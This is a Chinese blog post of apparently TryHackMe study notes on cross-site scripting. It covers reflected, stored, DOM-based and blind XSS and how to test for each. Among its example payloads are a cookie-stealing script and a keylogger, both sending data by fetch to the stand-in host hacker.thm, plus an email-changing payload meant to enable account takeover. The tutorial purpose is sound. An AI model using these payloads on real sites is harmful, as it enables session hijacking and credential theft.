首页 > 其他分享 >[THM]跨站点脚本(xss)

[THM]跨站点脚本(xss)

时间:2023-12-14 20:44:45浏览次数:28  
标签:DOM xss XSS 代码 JavaScript 用户 站点 THM 攻击者

XSS 有效负载

什么是有效载荷?

在 XSS 中,有效负载是我们希望在目标计算机上执行的 JavaScript 代码。有效载荷分为两部分,意图和修改。

目的是你希望 JavaScript 实际做什么(我们将在下面通过一些示例进行介绍),修改是我们需要对代码进行更改,以使其执行,因为每个场景都是不同的(在完善有效负载任务中对此进行了更多介绍)。

以下是 XSS 意图的一些示例。

概念验证:

这是最简单的有效负载,您要做的就是证明您可以在网站上实现 XSS。这通常是通过在页面上弹出一个带有文本字符串的警报框来完成的,例如:

<script>alert('XSS');</script>

会话窃取:

用户会话的详细信息(例如登录令牌)通常保存在目标计算机上的 Cookie 中。下面的 JavaScript 获取目标的 cookie,base64 对 cookie 进行编码以确保成功传输,然后将其发布到黑客控制的网站进行记录。一旦黑客拥有这些cookie,他们就可以接管目标的会话并以该用户的身份登录。

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
fetch() #用于发送HTTP请求并获取数据的方法
btoa() #它用于将字符串转换为Base64编码

键盘记录器:

下面的代码充当键盘记录器。这意味着您在网页上输入的任何内容都将被转发到黑客控制的网站。如果有效负载的网站安装在接受的用户登录信息或信用卡详细信息上,这可能会非常具有破坏性。

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

业务逻辑:

这个XSS payload比上面的例子要具体得多,此处会调用特定的网络资源或 JavaScript 函数。 例如,假设存在一个名为 user.changeEmail() 的用于更改用户电子邮件地址的 JavaScript 函数,对应的XSS payload可能如下所示:

<script>user.changeEmail('attacker@hacker.thm');</script>

如果帐户所对应的电子邮件地址已成功更改,那么攻击者就可以接着尝试执行针对目标用户的重置密码攻击。

接下来的四个小节将涵盖不同类型的 XSS 漏洞,这些 XSS 漏洞的实现都需要我们编写略有不同的XSS payload(经过精心构造的js代码)并且都需要让payload和用户发生交互。

 反射型 XSS

反射型 XSS

当 HTTP 请求中用户提供的数据包含在网页源中而未进行任何验证时,就会发生反射型 XSS

示例场景:
如果输入错误的输入,则会显示错误消息的网站。内容 错误消息取自查询字符串中的 error 参数,并且 直接内置于页面源代码中。

 应用程序不检查 error 参数的内容,允许攻击者插入 恶意代码

 

该漏洞可以按照下图中的场景使用:

 

 潜在影响:

攻击者 可以发送链接或将它们嵌入到其他网站上的 iframe 中 包含 JavaScript 有效负载,让潜在受害者获得 在他们的浏览器上执行代码,可能会泄露会话或客户 信息。

如何测试反射型 XSS

您需要测试每个可能的入口点;这些包括:

  • URL 查询字符串中的参数
  • URL 文件路径
  • 有时是 HTTP 标头(尽管在实践中不太可能被利用)

找到一些反映在 Web 应用程序中的数据后,您需要确认您可以成功运行 JavaScript 有效负载;有效负载将取决于代码在应用程序中的反映位置(您将在任务 6 中了解有关此内容的更多信息)。

存储的 XSS

示例场景:
A 允许用户发表评论的博客网站。不幸的是,这些 系统不会检查注释是否包含 JavaScript 或过滤器 删除任何恶意代码。如果我们现在发布包含 JavaScript 的评论, 这将存储在数据库中,并且现在访问的所有其他用户 本文将让 JavaScript 在他们的浏览器中运行。

 

 

潜在影响:

The 恶意 JavaScript 可以将用户重定向到另一个站点,窃取 用户的会话 cookie,或在充当 来访用户。

如何测试存储的 XSS

您需要测试每个可能的入口点,在这些入口点上似乎存储了数据,然后在其他用户可以访问的区域中显示回来;其中的一个小例子可能是:

  • 博客上的评论
  • 用户配置文件信息
  • 网站列表

有时,开发人员认为在客户端限制输入值已经足够好了,因此将值更改为 Web 应用程序不希望的值是发现存储的 XSS 的良好来源,例如,需要下拉菜单中整数的 age 字段,但相反,您手动发送请求,而不是使用允许您尝试恶意负载的表单。

一次 您已经找到了一些存储在 Web 应用程序中的数据,然后您需要确认您可以成功运行 JavaScript 有效负载;您的有效负载将取决于 应用程序:您的代码将得到反映

什么是 DOM?

 DOMxss

DOM 代表 Document Object Model,是一个 HTML和XML文档的编程接口。它表示页面,以便程序可以更改文档结构、样式和内容。一个 网页是一个文档,此文档可以显示在浏览器窗口中,也可以作为 HTML 源显示。HTML DOM 的图是 如下所示:

 

利用 DOM

DOM 基于 XSS 是直接在浏览器中执行 JavaScript 的地方,无需加载任何新页面或将数据提交到后端代码。当网站 JavaScript 代码作用于输入或 用户交互。示例场景:

网站的 JavaScript 从参数中获取内容,然后将其写入当前 已查看部分。不会检查哈希的内容是否为恶意 代码,允许攻击者将他们选择的 JavaScript 注入到 网页。

潜在影响:

攻击者可以将精心制作的基于DOM的 XSS链接发送给潜在的受害者,然后将受害者访问的页面重定向到另一个网站或者从用户所访问的当前页面、用户当前的会话中窃取内容。

如何测试基于DOM的 XSS:

对 基于 DOM 的 XSS 进行测试可能具有挑战性,并且需要一定的 JavaScript 知识才能阅读相关源代码。 你需要查找攻击者可以控制的并且能够访问某些变量的代码部分,例如“window.location.x”参数。

找到这些代码后,你需要查看它们是如何处理变量的,以及这些值是否曾被写入网页的DOM中 或者 能够被传递给不安全的 JavaScript 方法--例如 eval()方法。

盲 XSS

示例场景:

假设目标网站有一个联系表单,你可以通过该表单向网站相关工作人员发送消息。如果目标站点不检查邮件内容是否有任何恶意代码,这将使得攻击者可以在邮件中输入他们想要的任何内容;然后,这些邮件消息会变成目标站点的业务工单,员工可以在私人门户(入口页)网站上查看这些工单,从而触发XSS攻击。

潜在影响:

当攻击者使用了正确的XSS payload时,相关代码就可以回调攻击者所拥有的网站,从而显示目标站点的员工门户(入口页) URL、员工的 cookie,甚至员工正在查看的门户(入口页)内容;然后攻击者就可以尝试劫持员工的会话并访问一些私有门户(入口页)。

如何测试Blind(盲注)型 XSS:

在测试 Blind XSS 漏洞时,你需要确保你的 XSS payload 有回调(通常是一个HTTP请求);这样,你就能知道你的代码是否被执行以及何时被执行。

一种流行的Blind XSS 攻击工具是 xsshunter。 虽然你可以用 JavaScript代码 制作你自己的工具,但是通过使用xsshunter工具(该工具页面处于关闭注册状态)会自动帮助你捕获 cookie、URL、页面内容等。

标签:DOM,xss,XSS,代码,JavaScript,用户,站点,THM,攻击者
From: https://www.cnblogs.com/trymonoly/p/17901913.html

相关文章

  • 【THM】SSRF伪造
    SSRF示例 直接拼接用户输入的url。 服务器指定url后用户可以拼接一些其他 用户可以控制子域名 指明接口服务器,去做验证。 查找SSRF可以通过许多不同的方式在Web应用程序中发现潜在的 SSRF 漏洞。以下是四个常见位置的示例:在地址栏中的参数中使用完整URL时......
  • 使用Apache POI 导入导出时出现You need to call a different part of POI to process
    问题复现在学习导出功能时使用HSSFWorkbook导出了一个xxx.xlsx格式的文件,然后用XSSFWorkbook的读取方式来拿文件去导入时出现了这个bug这是当时做导出测试代码Workbookwb=newHSSFWorkbook();CreationHelpercreationHelper=wb.getCreationHelper();Sheetsheet=wb.cr......
  • nginx配置多个站点共用80端口,不算端口冲突吗?
    在使用Nginx配置多个站点时,可以将它们共享一个端口(例如80端口)。这是因为Nginx使用虚拟主机(VirtualHost)的概念,通过对访问请求进行区分,将请求发送到不同的站点。Nginx的配置文件中,可以通过server块来定义不同的虚拟主机。每个server块中可以指定不同的域名或IP地址,并设置对应的站点......
  • 【THM】IDOR公司
    IDOR示例想象一下,您刚刚注册了一项在线服务,并且想要更改您的个人资料信息。您单击的链接将转到http://online-service.thm/profile?user_id=1305,您可以看到您的信息。好奇心占了上风,你尝试将user_id值更改为1000(http://online-service.thm/profile?user_id=1000),令您惊讶的是,......
  • A fast and simple algorithm for training neural probabilistic language models
    目录概NoisecontrastiveestimationMnihA.andTehY.W.Afastandsimplealgorithmfortrainingneuralprobabilisticlanguagemodels.ICML,2012.概NCE用在语言模型的训练上.Noisecontrastiveestimation给定context\(h\),下一个词为\(w\)的条件概率按......
  • [THM] 身份验证绕过补档
    用户名枚举在尝试查找身份验证漏洞时,要完成的一个有用的练习是创建有效用户名列表,我们稍后将在其他任务中使用该列表。 网站错误消息是整理此信息以构建有效用户名列表的重要资源。如果我们转到AcmeIT支持网站(http://10.10.237.210/customers/signup)注册页面,我们有一个创......
  • 【THM】子域枚举
    子域名枚举分为三种我们将探索三种不同的子域枚举方法:蛮力、OSINT(开源智能)和虚拟主机。OSINT-SSL/TLS证书SSL/TLS证书什么时候SSL/TLS(安全套接字层/传输层安全)证书由CA(证书颁发机构)为域创建,CA参与所谓的“证书透明度(CT)日志”。这些是为每个SSL/TLS证书创建的每个S......
  • [THM]content discovery
    手动发现-robots.txtrobots.txt是告诉搜索引擎,那些页面是不允许爬的,这有利于我们渗透测试发现更多有用信息 手动发现-Favicon网站图标网站图标是显示在浏览器地址栏或选项卡中的一个小图标,用于为网站打造品牌。 有时当使用框架来构建网站时,作为安装一部分的网站图......
  • BBS 密码修改 个人站点 ……
    修改密码 后台@login_required(login_url='/login/')defchange_password(request):#1取出原密码---校验原密码是否正确old_password=request.POST.get('old_password')ifrequest.user.check_password(old_password):new_password=request......
  • 【THM】钢铁山
     找到本月最佳员工是billHarper发现运行在8080的是RejettoHTTPFileServer,然后去exploit上寻找利用漏洞  用msf获得shell 拿到了题目说的用户标志权限提升 为了枚举这台机器,我们将使用一个名为PowerUp的powershell脚本,其目的是评估Windows机器并确定任何......